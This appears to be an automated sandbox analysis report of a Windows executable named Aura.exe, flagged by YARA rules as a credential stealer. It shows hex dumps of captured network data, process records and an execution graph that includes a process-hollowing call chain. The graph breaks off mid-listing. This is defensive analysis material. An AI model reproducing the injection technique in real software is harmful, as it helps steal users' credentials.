                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 6f 44 38 55 58 30 67 62 52 47 48 67 46 68 6e 53 71 4a 34 38 69 37 62 6b 63 68 53 57 67 76 35 31 34 77 52 38 53 34 59 45 61 51 33 41 72 4a 53 64 62 65 6e 43 59 30 4e 45 44 4b 4b 36 6e 30 6f 4c 34 31 41 6e 6b 6c 51 44 44 6d 55 41 78 30 79 35 55 41 50 36 2f 51 51 75 30 57 30 59 53 77 50 44 39 79 48 65 77 37 79 2b 33 55 31 44 41 5a 4c 41 6c 4c 62 2f 5a 6a 49 32 37 44 67 68 39 68 6e 39 52 58 72 6d 33 52 73 6f 38 39 4b 7a 5a 4f 7a 7a 69 55 30 64 4c 39 61 56 34 52 55 33 4d 78 78 56 38 75 41 76 4f 47 50 54 79 47 69 48 76 4b 45 66 79 52 70 48 30 74 43 57 7a 70 41 38 6e 42 34 73 31 65 42 53 51 4a 64 57 76 7a 57 42 35 42 36 70 45 75 55 64 7a 79 56 50 77 59 78 4a 32 47 49 67 56 70 52 74 77 69 6e 73 44 43 32 6a 59 41 66 30 77 74 42 39 74 48 48 30 2f 57 6f 69 46 38 76
                                                                                                                                                                                                                                                  Data Ascii: oD8UX0gbRGHgFhnSqJ48i7bkchSWgv514wR8S4YEaQ3ArJSdbenCY0NEDKK6n0oL41AnklQDDmUAx0y5UAP6/QQu0W0YSwPD9yHew7y+3U1DAZLAlLb/ZjI27Dgh9hn9RXrm3Rso89KzZOzziU0dL9aV4RU3MxxV8uAvOGPTyGiHvKEfyRpH0tCWzpA8nB4s1eBSQJdWvzWB5B6pEuUdzyVPwYxJ2GIgVpRtwinsDC2jYAf0wtB9tHH0/WoiF8v
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC95INData Raw: 52 39 73 4f 52 59 7a 59 42 58 66 59 4e 74 5a 4b 6a 33 6d 74 78 47 7a 74 53 4e 75 78 6e 44 30 4c 75 72 77 45 35 6e 4d 38 45 32 52 66 2b 75 34 68 78 48 68 42 39 78 67 32 55 78 38 6e 55 64 48 52 38 4a 57 30 38 75 6b 63 38 51 65 32 47 4c 57 50 44 2b 6d 44 78 64 4f 4c 44 39 32 51 41 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: R9sORYzYBXfYNtZKj3mtxGztSNuxnD0LurwE5nM8E2Rf+u4hxHhB9xg2Ux8nUdHR8JW08ukc8Qe2GLWPD+mDxdOLD92QA
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 32 62 31 38 0d 0a 46 6e 6a 39 48 5a 2f 42 77 37 31 43 55 33 38 45 51 53 65 79 65 68 5a 30 2b 37 6b 4f 54 5a 2f 4d 53 36 70 4f 31 49 32 69 51 79 6b 56 41 4e 34 6d 67 4f 44 49 2f 6e 63 45 4b 52 56 51 62 73 59 51 4b 45 2f 6f 32 52 46 43 76 6f 74 61 33 33 54 2b 75 37 64 4e 45 44 4a 36 33 41 47 4d 38 63 32 6a 62 6d 63 36 42 6d 78 70 35 6b 74 43 59 74 65 59 41 54 44 46 39 46 6a 33 59 38 7a 61 68 45 39 67 41 47 7a 68 50 70 37 72 30 38 6c 76 42 67 38 45 56 6a 4c 46 57 68 34 41 34 4e 41 2f 50 70 7a 4a 55 63 6c 30 78 49 4f 52 65 67 34 6b 57 2f 51 54 67 39 58 54 35 6e 4a 35 65 67 52 65 4f 74 68 45 4f 6e 33 54 30 41 46 41 6a 59 31 6b 36 57 50 4d 32 6f 4d 78 4c 41 4e 43 34 48 6d 32 30 76 62 69 59 33 30 5a 46 6d 6f 6e 35 67 4a 51 44 38 54 57 65 33 71 36 32 56 2b 75 54
                                                                                                                                                                                                                                                  Data Ascii: 2b18Fnj9HZ/Bw71CU38EQSeyehZ0+7kOTZ/MS6pO1I2iQykVAN4mgODI/ncEKRVQbsYQKE/o2RFCvota33T+u7dNEDJ63AGM8c2jbmc6Bmxp5ktCYteYATDF9Fj3Y8zahE9gAGzhPp7r08lvBg8EVjLFWh4A4NA/PpzJUcl0xIOReg4kW/QTg9XT5nJ5egReOthEOn3T0AFAjY1k6WPM2oMxLANC4Hm20vbiY30ZFmon5gJQD8TWe3q62V+uT
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 67 62 41 6c 6e 6e 41 2b 2f 6b 2f 53 34 61 57 59 46 42 46 77 52 34 47 5a 4a 48 66 65 6d 59 48 4f 79 31 41 4c 42 44 71 61 47 73 54 34 33 43 6d 44 62 4c 4b 2f 79 36 62 77 30 53 78 34 2f 61 42 72 67 63 79 4a 59 6b 39 55 6a 65 5a 44 66 52 74 70 32 79 59 65 76 62 41 39 78 48 4f 4d 48 73 76 66 32 31 6b 51 42 4b 78 30 73 4b 63 56 73 43 48 53 57 6c 41 31 65 78 39 45 59 31 30 62 43 68 70 4e 65 4c 58 64 7a 35 67 36 55 35 2f 58 65 53 30 4d 43 44 58 77 70 79 33 38 63 62 2b 4f 59 4c 57 47 77 30 56 61 72 59 39 47 57 6f 56 74 75 42 52 76 6a 48 59 7a 7a 34 74 74 6c 51 68 63 6d 59 43 6e 41 51 77 35 39 6c 62 55 63 4f 4b 4f 4a 53 38 74 44 70 6f 43 59 51 42 6f 6b 66 65 59 2b 74 73 44 51 2b 46 73 64 47 45 68 4c 4c 38 41 5a 4e 77 48 53 74 6a 6b 69 7a 34 78 30 2f 47 2f 6e 77 70
                                                                                                                                                                                                                                                  Data Ascii: gbAlnnA+/k/S4aWYFBFwR4GZJHfemYHOy1ALBDqaGsT43CmDbLK/y6bw0Sx4/aBrgcyJYk9UjeZDfRtp2yYevbA9xHOMHsvf21kQBKx0sKcVsCHSWlA1ex9EY10bChpNeLXdz5g6U5/XeS0MCDXwpy38cb+OYLWGw0VarY9GWoVtuBRvjHYzz4ttlQhcmYCnAQw59lbUcOKOJS8tDpoCYQBokfeY+tsDQ+FsdGEhLL8AZNwHStjkiz4x0/G/nwp
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 57 66 38 73 71 39 54 64 2f 7a 4e 59 4b 54 38 70 45 39 5a 66 4b 6b 58 32 67 6a 74 54 72 63 52 45 33 30 76 6c 76 76 64 78 48 69 4a 78 6c 78 2b 4c 30 4b 48 63 4d 30 68 39 4b 32 31 6f 79 30 6f 65 61 6f 36 75 66 56 6d 76 30 33 72 56 65 66 4c 43 74 6e 45 74 64 57 4b 59 4c 63 7a 79 36 63 31 53 5a 53 6f 6d 65 7a 44 6e 59 52 70 59 77 36 6f 73 65 4b 4c 72 5a 76 4a 7a 39 6f 50 31 55 57 41 38 5a 50 38 78 72 38 62 41 34 33 42 39 4a 51 52 58 45 72 45 43 46 58 50 43 6c 42 31 6b 70 74 64 41 74 6c 66 58 6e 66 52 4c 49 51 56 64 34 48 71 56 37 4d 76 6c 54 6b 73 75 49 44 59 38 31 6e 77 76 62 50 43 6c 66 7a 2b 78 38 32 62 62 59 4b 6e 4e 36 30 4a 76 48 32 66 50 4c 70 37 4b 6f 2f 77 31 47 58 77 46 57 43 79 7a 5a 44 4e 59 77 39 41 52 62 4c 58 68 48 50 70 45 2f 70 44 35 58 78 51
                                                                                                                                                                                                                                                  Data Ascii: Wf8sq9Td/zNYKT8pE9ZfKkX2gjtTrcRE30vlvvdxHiJxlx+L0KHcM0h9K21oy0oeao6ufVmv03rVefLCtnEtdWKYLczy6c1SZSomezDnYRpYw6oseKLrZvJz9oP1UWA8ZP8xr8bA43B9JQRXErECFXPClB1kptdAtlfXnfRLIQVd4HqV7MvlTksuIDY81nwvbPClfz+x82bbYKnN60JvH2fPLp7Ko/w1GXwFWCyzZDNYw9ARbLXhHPpE/pD5XxQ
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 4a 53 57 2f 39 35 44 55 54 6f 7a 61 44 76 51 52 44 6c 59 79 4a 51 66 59 62 47 57 62 37 4a 4d 2b 71 65 55 51 6a 67 68 57 5a 77 74 6d 66 6a 49 31 57 6c 57 42 44 31 31 4c 66 49 66 54 32 50 32 67 53 78 78 6b 38 68 78 72 31 6a 63 6f 49 31 2b 45 7a 78 43 6e 51 79 78 39 75 6a 51 4b 47 49 71 4c 32 6f 76 75 78 34 49 59 4a 62 4c 4f 47 47 2b 34 52 7a 6b 55 39 32 66 71 46 73 31 63 33 71 5a 45 36 76 31 30 4e 5a 67 61 48 6b 4f 54 47 72 51 54 77 30 44 7a 74 5a 2f 62 72 48 76 56 66 46 49 34 59 57 33 61 68 49 50 58 2b 67 77 6c 63 61 6c 70 30 46 31 44 67 68 39 46 39 56 71 45 31 6e 6a 6d 43 70 34 6e 39 35 65 35 56 54 4d 32 71 31 6a 48 52 45 65 79 53 48 50 6c 4b 4f 38 61 47 55 49 56 32 74 71 39 58 56 55 59 2f 33 50 4a 30 69 57 6a 56 33 76 46 62 76 44 67 6a 73 46 61 58 4c 61
                                                                                                                                                                                                                                                  Data Ascii: JSW/95DUTozaDvQRDlYyJQfYbGWb7JM+qeUQjghWZwtmfjI1WlWBD11LfIfT2P2gSxxk8hxr1jcoI1+EzxCnQyx9ujQKGIqL2ovux4IYJbLOGG+4RzkU92fqFs1c3qZE6v10NZgaHkOTGrQTw0DztZ/brHvVfFI4YW3ahIPX+gwlcalp0F1Dgh9F9VqE1njmCp4n95e5VTM2q1jHREeySHPlKO8aGUIV2tq9XVUY/3PJ0iWjV3vFbvDgjsFaXLa
                                                                                                                                                                                                                                                  2024-12-27 22:47:50 UTC1369INData Raw: 6e 5a 5a 46 51 71 50 6c 34 77 78 58 45 52 66 2b 53 43 44 33 6d 31 30 51 62 73 55 4d 57 47 6b 58 6b 78 64 41 44 73 43 4d 72 57 78 65 52 42 47 51 49 74 54 53 7a 70 54 79 31 53 36 72 55 36 62 49 2f 4d 56 50 49 4b 33 38 47 74 50 67 31 31 53 73 4d 63 77 74 58 31 31 6b 70 46 4b 79 6c 41 47 65 64 69 53 6e 6e 6b 75 48 77 69 6c 73 6c 55 72 56 48 62 76 4a 52 63 50 77 35 54 32 79 79 38 6c 74 71 30 51 55 49 36 54 69 6f 33 36 45 77 6a 5a 65 61 4f 4a 57 47 72 6b 6c 6e 36 53 62 75 46 6c 56 38 4e 4e 57 6d 61 50 4c 4c 31 6f 65 42 62 48 51 38 6b 62 47 33 79 47 54 70 36 39 5a 6f 53 50 35 76 36 65 38 64 4a 33 71 54 34 59 7a 67 4a 66 75 64 35 76 4a 76 49 2b 44 52 77 65 68 45 68 47 37 6f 5a 54 6c 66 46 71 7a 35 2f 70 73 35 6b 2f 31 48 4b 72 37 6c 2b 47 79 78 65 35 58 32 5a 6c
                                                                                                                                                                                                                                                  Data Ascii: nZZFQqPl4wxXERf+SCD3m10QbsUMWGkXkxdADsCMrWxeRBGQItTSzpTy1S6rU6bI/MVPIK38GtPg11SsMcwtX11kpFKylAGediSnnkuHwilslUrVHbvJRcPw5T2yy8ltq0QUI6Tio36EwjZeaOJWGrkln6SbuFlV8NNWmaPLL1oeBbHQ8kbG3yGTp69ZoSP5v6e8dJ3qT4YzgJfud5vJvI+DRwehEhG7oZTlfFqz5/ps5k/1HKr7l+Gyxe5X2Zl


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:17:47:22
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Aura.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa0000
                                                                                                                                                                                                                                                  File size:569'384 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD5FBA5D5BEF2952443B96241FFA5814
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:17:47:22
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:17:47:23
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Aura.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa0000
                                                                                                                                                                                                                                                  File size:569'384 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD5FBA5D5BEF2952443B96241FFA5814
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1842452334.0000000003427000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1842261348.0000000003424000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:6.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                                    Signature Coverage:5.3%
                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                                                                                                                    execution_graph 19847 da19e 19852 da1d4 19847->19852 19848 da321 GetPEB 19849 da333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 19848->19849 19850 da3da WriteProcessMemory 19849->19850 19849->19852 19851 da41f 19850->19851 19853 da424 WriteProcessMemory 19851->19853 19854 da461 WriteProcessMemory Wow64SetThreadContext ResumeThread 19851->19854 19852->19848 19852->19849 19853->19851 19855 b0312 19856 b031e ___scrt_is_nonwritable_in_current_image 19855->19856 19881 aa8ca 19856->19881 19858 b0325 19859 b047e 19858->19859 19869 b034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 19858->19869 19936 af8e9 IsProcessorFeaturePresent 19859->19936 19861 b0485 19916 b5545 19861->19916 19866 b036e 19867 b03ef 19892 b7abc 19867->19892 19869->19866 19869->19867 19919 b558f 19869->19919 19871 b03f5 19896 a24b0 GetConsoleWindow ShowWindow 19871->19896 19873 b040c 19925 af896 GetModuleHandleW 19873->19925 19876 b041a 19877 b0423 19876->19877 19927 b5571 19876->19927 19930 aa903 19877->19930 19882 aa8d3 19881->19882 19943 af555 IsProcessorFeaturePresent 19882->19943 19886 aa8e4 19887 aa8e8 19886->19887 19953 b3230 19886->19953 19887->19858 19890 aa8ff 19890->19858 19893 b7aca 19892->19893 19894 b7ac5 19892->19894 19893->19871 20025 b7be5 19894->20025 20867 aa663 19896->20867 19900 a2513 19901 a251d 19900->19901 19902 a2554 19900->19902 19904 a256c 19901->19904 19905 a2524 GetCurrentThreadId 19901->19905 20899 ab317 19902->20899 19908 ab317 std::_Throw_Cpp_error 30 API calls 19904->19908 19906 a252d 19905->19906 19907 a257d 19905->19907 20893 af11d WaitForSingleObjectEx 19906->20893 19910 ab317 std::_Throw_Cpp_error 30 API calls 19907->19910 19908->19907 19912 a258e 19910->19912 19914 ab317 std::_Throw_Cpp_error 30 API calls 19912->19914 19913 a2541 19913->19873 19915 a259f 19914->19915 19915->19873 21079 b5690 19916->21079 19920 b55a5 ___scrt_is_nonwritable_in_current_image __Getctype 19919->19920 19920->19867 19921 bc16a __Getctype 39 API calls 19920->19921 19924 ba17c 19921->19924 19922 b8353 CallUnexpected 39 API calls 19923 ba1a6 19922->19923 19924->19922 19926 af8a2 19925->19926 19926->19861 19926->19876 19928 b5690 CallUnexpected 21 API calls 19927->19928 19929 b557c 19928->19929 19929->19877 19931 aa90f 19930->19931 19932 aa925 19931->19932 21152 b3242 19931->21152 19932->19866 19934 aa91d 19935 b0ce7 ___scrt_uninitialize_crt 7 API calls 19934->19935 19935->19932 19937 af8ff __fread_nolock CallUnexpected 19936->19937 19938 af9aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19937->19938 19939 af9ee CallUnexpected 19938->19939 19939->19861 19940 b555b 19941 b5690 CallUnexpected 21 API calls 19940->19941 19942 b0493 19941->19942 19944 aa8df 19943->19944 19945 b0cc8 19944->19945 19962 bbba6 19945->19962 19949 b0cd9 19950 b0ce4 19949->19950 19976 bbbe2 19949->19976 19950->19886 19952 b0cd1 19952->19886 20016 be2e9 19953->20016 19956 b0ce7 19957 b0cfa 19956->19957 19958 b0cf0 19956->19958 19957->19887 19959 bacbe ___vcrt_uninitialize_ptd 6 API calls 19958->19959 19960 b0cf5 19959->19960 19961 bbbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 19960->19961 19961->19957 19963 bbbaf 19962->19963 19965 bbbd8 19963->19965 19966 b0ccd 19963->19966 19980 c68f9 19963->19980 19967 bbbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 19965->19967 19966->19952 19968 bac8b 19966->19968 19967->19966 19997 c680a 19968->19997 19971 baca0 19971->19949 19974 bacbb 19974->19949 19977 bbc0c 19976->19977 19978 bbbed 19976->19978 19977->19952 19979 bbbf7 DeleteCriticalSection 19978->19979 19979->19977 19979->19979 19985 c698b 19980->19985 19983 c6931 InitializeCriticalSectionAndSpinCount 19984 c691c 19983->19984 19984->19963 19986 c6913 19985->19986 19989 c69ac 19985->19989 19986->19983 19986->19984 19987 c6a14 GetProcAddress 19987->19986 19989->19986 19989->19987 19990 c6a05 19989->19990 19992 c6940 LoadLibraryExW 19989->19992 19990->19987 19991 c6a0d FreeLibrary 19990->19991 19991->19987 19993 c6987 19992->19993 19994 c6957 GetLastError 19992->19994 19993->19989 19994->19993 19995 c6962 ___vcrt_FlsSetValue 19994->19995 19995->19993 19996 c6978 LoadLibraryExW 19995->19996 19996->19989 19998 c698b ___vcrt_FlsSetValue 5 API calls 19997->19998 19999 c6824 19998->19999 20000 c683d TlsAlloc 19999->20000 20001 bac95 19999->20001 20001->19971 20002 c68bb 20001->20002 20003 c698b ___vcrt_FlsSetValue 5 API calls 20002->20003 20004 c68d5 20003->20004 20005 c68f0 TlsSetValue 20004->20005 20006 bacae 20004->20006 20005->20006 20006->19974 20007 bacbe 20006->20007 20008 bacc8 20007->20008 20009 bacce 20007->20009 20011 c6845 20008->20011 20009->19971 20012 c698b ___vcrt_FlsSetValue 5 API calls 20011->20012 20013 c685f 20012->20013 20014 c6877 TlsFree 20013->20014 20015 c686b 20013->20015 20014->20015 20015->20009 20017 be2f9 20016->20017 20018 aa8f1 20016->20018 20017->20018 20020 bda52 20017->20020 20018->19890 20018->19956 20024 bda59 20020->20024 20021 bda9c GetStdHandle 20021->20024 20022 bdafe 20022->20017 20023 bdaaf GetFileType 20023->20024 20024->20021 20024->20022 20024->20023 20026 b7bee 20025->20026 20030 b7c04 20025->20030 20026->20030 20031 b7b26 20026->20031 20028 b7bfb 20028->20030 20048 b7cf3 20028->20048 20030->19893 20032 b7b2f 20031->20032 20033 b7b32 20031->20033 20032->20028 20057 bdb20 20033->20057 20038 b7b4f 20090 b7c11 20038->20090 20039 b7b43 20084 bbed7 20039->20084 20044 bbed7 ___free_lconv_mon 14 API calls 20045 b7b73 20044->20045 20046 bbed7 ___free_lconv_mon 14 API calls 20045->20046 20047 b7b79 20046->20047 20047->20028 20049 b7d64 20048->20049 20052 b7d02 20048->20052 20049->20030 20050 bc021 WideCharToMultiByte _Fputc 20050->20052 20051 bd2b4 __Getctype 14 API calls 20051->20052 20052->20049 20052->20050 20052->20051 20054 b7d68 20052->20054 20056 bbed7 ___free_lconv_mon 14 API calls 20052->20056 20652 c3295 20052->20652 20053 bbed7 ___free_lconv_mon 14 API calls 20053->20049 20054->20053 20056->20052 20058 bdb29 20057->20058 20059 b7b38 20057->20059 20112 bc225 20058->20112 20063 c31be GetEnvironmentStringsW 20059->20063 20064 c31d6 20063->20064 20069 b7b3d 20063->20069 20065 bc021 _Fputc WideCharToMultiByte 20064->20065 20066 c31f3 20065->20066 20067 c31fd FreeEnvironmentStringsW 20066->20067 20068 c3208 20066->20068 20067->20069 20070 bbf11 __fread_nolock 15 API calls 20068->20070 20069->20038 20069->20039 20071 c320f 20070->20071 20072 c3228 20071->20072 20073 c3217 20071->20073 20075 bc021 _Fputc WideCharToMultiByte 20072->20075 20074 bbed7 ___free_lconv_mon 14 API calls 20073->20074 20076 c321c FreeEnvironmentStringsW 20074->20076 20077 c3238 20075->20077 20076->20069 20078 c323f 20077->20078 20079 c3247 20077->20079 20081 bbed7 ___free_lconv_mon 14 API calls 20078->20081 20080 bbed7 ___free_lconv_mon 14 API calls 20079->20080 20082 c3245 FreeEnvironmentStringsW 20080->20082 20081->20082 20082->20069 20085 bbee2 RtlFreeHeap 20084->20085 20089 b7b49 20084->20089 20086 bbef7 GetLastError 20085->20086 20085->20089 20087 bbf04 __dosmaperr 20086->20087 20088 b76e4 __dosmaperr 12 API calls 20087->20088 20088->20089 20089->20028 20091 b7c26 20090->20091 20092 bd2b4 __Getctype 14 API calls 20091->20092 20093 b7c4d 20092->20093 20094 b7c55 20093->20094 20103 b7c5f 20093->20103 20095 bbed7 ___free_lconv_mon 14 API calls 20094->20095 20111 b7b56 20095->20111 20096 b7cbc 20097 bbed7 ___free_lconv_mon 14 API calls 20096->20097 20097->20111 20098 bd2b4 __Getctype 14 API calls 20098->20103 20099 b7ccb 20642 b7bb6 20099->20642 20103->20096 20103->20098 20103->20099 20104 b7ce6 20103->20104 20106 bbed7 ___free_lconv_mon 14 API calls 20103->20106 20633 bbb4c 20103->20633 20648 b7dfc IsProcessorFeaturePresent 20104->20648 20105 bbed7 ___free_lconv_mon 14 API calls 20108 b7cd8 20105->20108 20106->20103 20110 bbed7 ___free_lconv_mon 14 API calls 20108->20110 20109 b7cf2 20110->20111 20111->20044 20113 bc236 20112->20113 20114 bc230 20112->20114 20134 bc23c 20113->20134 20164 bcbd3 20113->20164 20159 bcb94 20114->20159 20122 bc268 20124 bcbd3 __Getctype 6 API calls 20122->20124 20123 bc27d 20125 bcbd3 __Getctype 6 API calls 20123->20125 20132 bc274 20124->20132 20126 bc289 20125->20126 20127 bc28d 20126->20127 20128 bc29c 20126->20128 20131 bcbd3 __Getctype 6 API calls 20127->20131 20176 bc47c 20128->20176 20130 bbed7 ___free_lconv_mon 14 API calls 20130->20134 20131->20132 20132->20130 20136 bc241 20134->20136 20181 b8353 20134->20181 20137 bdee1 20136->20137 20138 bdf0b 20137->20138 20454 bdd6d 20138->20454 20143 bdf4b 20468 bdb68 20143->20468 20144 bdf3d 20145 bbed7 ___free_lconv_mon 14 API calls 20144->20145 20147 bdf24 20145->20147 20147->20059 20149 bdf83 20150 b76e4 __dosmaperr 14 API calls 20149->20150 20152 bdf88 20150->20152 20151 bdfca 20154 be013 20151->20154 20479 be29c 20151->20479 20155 bbed7 ___free_lconv_mon 14 API calls 20152->20155 20153 bdf9e 20153->20151 20156 bbed7 ___free_lconv_mon 14 API calls 20153->20156 20158 bbed7 ___free_lconv_mon 14 API calls 20154->20158 20155->20147 20156->20151 20158->20147 20192 bcfd6 20159->20192 20162 bcbcb TlsGetValue 20163 bcbb9 20163->20113 20165 bcfd6 __Getctype 5 API calls 20164->20165 20166 bcbef 20165->20166 20167 bc250 20166->20167 20168 bcc0d TlsSetValue 20166->20168 20167->20134 20169 bd2b4 20167->20169 20174 bd2c1 __Getctype 20169->20174 20170 bd301 20210 b76e4 20170->20210 20171 bd2ec RtlAllocateHeap 20172 bc260 20171->20172 20171->20174 20172->20122 20172->20123 20174->20170 20174->20171 20207 b5877 20174->20207 20247 bc5e2 20176->20247 20349 be3a0 20181->20349 20185 b836d IsProcessorFeaturePresent 20187 b8379 20185->20187 20186 b8363 20186->20185 20191 b838c 20186->20191 20379 b7e30 20187->20379 20188 b555b CallUnexpected 21 API calls 20190 b8396 20188->20190 20191->20188 20193 bd006 20192->20193 20196 bcbb0 20192->20196 20193->20196 20199 bcf0b 20193->20199 20196->20162 20196->20163 20197 bd020 GetProcAddress 20197->20196 20198 bd030 __Getctype 20197->20198 20198->20196 20200 bcf1c ___vcrt_FlsSetValue 20199->20200 20201 bcfb2 20200->20201 20202 bcf3a LoadLibraryExW 20200->20202 20206 bcf88 LoadLibraryExW 20200->20206 20201->20196 20201->20197 20203 bcfb9 20202->20203 20204 bcf55 GetLastError 20202->20204 20203->20201 20205 bcfcb FreeLibrary 20203->20205 20204->20200 20205->20201 20206->20200 20206->20203 20213 b58b2 20207->20213 20224 bc2bb GetLastError 20210->20224 20212 b76e9 20212->20172 20214 b58be ___scrt_is_nonwritable_in_current_image 20213->20214 20219 b80e1 EnterCriticalSection 20214->20219 20216 b58c9 CallUnexpected 20220 b5900 20216->20220 20219->20216 20223 b80f8 LeaveCriticalSection 20220->20223 20222 b5882 20222->20174 20223->20222 20225 bc2d7 20224->20225 20226 bc2d1 20224->20226 20227 bcbd3 __Getctype 6 API calls 20225->20227 20230 bc2db SetLastError 20225->20230 20228 bcb94 __Getctype 6 API calls 20226->20228 20229 bc2f3 20227->20229 20228->20225 20229->20230 20232 bd2b4 __Getctype 12 API calls 20229->20232 20230->20212 20233 bc308 20232->20233 20234 bc321 20233->20234 20235 bc310 20233->20235 20237 bcbd3 __Getctype 6 API calls 20234->20237 20236 bcbd3 __Getctype 6 API calls 20235->20236 20239 bc31e 20236->20239 20238 bc32d 20237->20238 20240 bc348 20238->20240 20241 bc331 20238->20241 20242 bbed7 ___free_lconv_mon 12 API calls 20239->20242 20243 bc47c __Getctype 12 API calls 20240->20243 20244 bcbd3 __Getctype 6 API calls 20241->20244 20242->20230 20245 bc353 20243->20245 20244->20239 20246 bbed7 ___free_lconv_mon 12 API calls 20245->20246 20246->20230 20248 bc5ee ___scrt_is_nonwritable_in_current_image 20247->20248 20261 b80e1 EnterCriticalSection 20248->20261 20250 bc5f8 20262 bc628 20250->20262 20253 bc634 20254 bc640 ___scrt_is_nonwritable_in_current_image 20253->20254 20266 b80e1 EnterCriticalSection 20254->20266 20256 bc64a 20267 bc431 20256->20267 20258 bc662 20271 bc682 20258->20271 20261->20250 20265 b80f8 LeaveCriticalSection 20262->20265 20264 bc4ea 20264->20253 20265->20264 20266->20256 20268 bc440 __Getctype 20267->20268 20269 bc467 __Getctype 20267->20269 20268->20269 20274 c06da 20268->20274 20269->20258 20348 b80f8 LeaveCriticalSection 20271->20348 20275 c06f0 20274->20275 20277 c075a 20274->20277 20275->20277 20279 c0723 20275->20279 20285 bbed7 ___free_lconv_mon 14 API calls 20275->20285 20278 bbed7 ___free_lconv_mon 14 API calls 20277->20278 20301 c07a8 20277->20301 20280 c077c 20278->20280 20281 c0745 20279->20281 20286 bbed7 ___free_lconv_mon 14 API calls 20279->20286 20342 c0874 20301->20342 20385 be623 20349->20385 20352 be3c7 20356 be3d3 ___scrt_is_nonwritable_in_current_image 20352->20356 20353 bc2bb __dosmaperr 14 API calls 20360 be404 CallUnexpected 20353->20360 20354 be423 20355 b76e4 __dosmaperr 14 API calls 20354->20355 20358 be428 20355->20358 20356->20353 20356->20354 20357 be435 CallUnexpected 20356->20357 20356->20360 20359 be46b CallUnexpected 20357->20359 20399 b80e1 EnterCriticalSection 20357->20399 20396 b7dcf 20358->20396 20364 be4a8 20359->20364 20365 be5a5 20359->20365 20375 be4d6 20359->20375 20360->20354 20360->20357 20378 be40d 20360->20378 20364->20375 20400 bc16a GetLastError 20364->20400 20367 be5b0 20365->20367 20431 b80f8 LeaveCriticalSection 20365->20431 20368 b555b CallUnexpected 21 API calls 20367->20368 20370 be5b8 20368->20370 20372 bc16a __Getctype 39 API calls 20376 be52b 20372->20376 20374 bc16a __Getctype 39 API calls 20374->20375 20427 be551 20375->20427 20377 bc16a __Getctype 39 API calls 20376->20377 20376->20378 20377->20378 20378->20186 20380 b7e4c __fread_nolock CallUnexpected 20379->20380 20381 b7e78 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20380->20381 20384 b7f49 CallUnexpected 20381->20384 20383 b7f67 20383->20191 20446 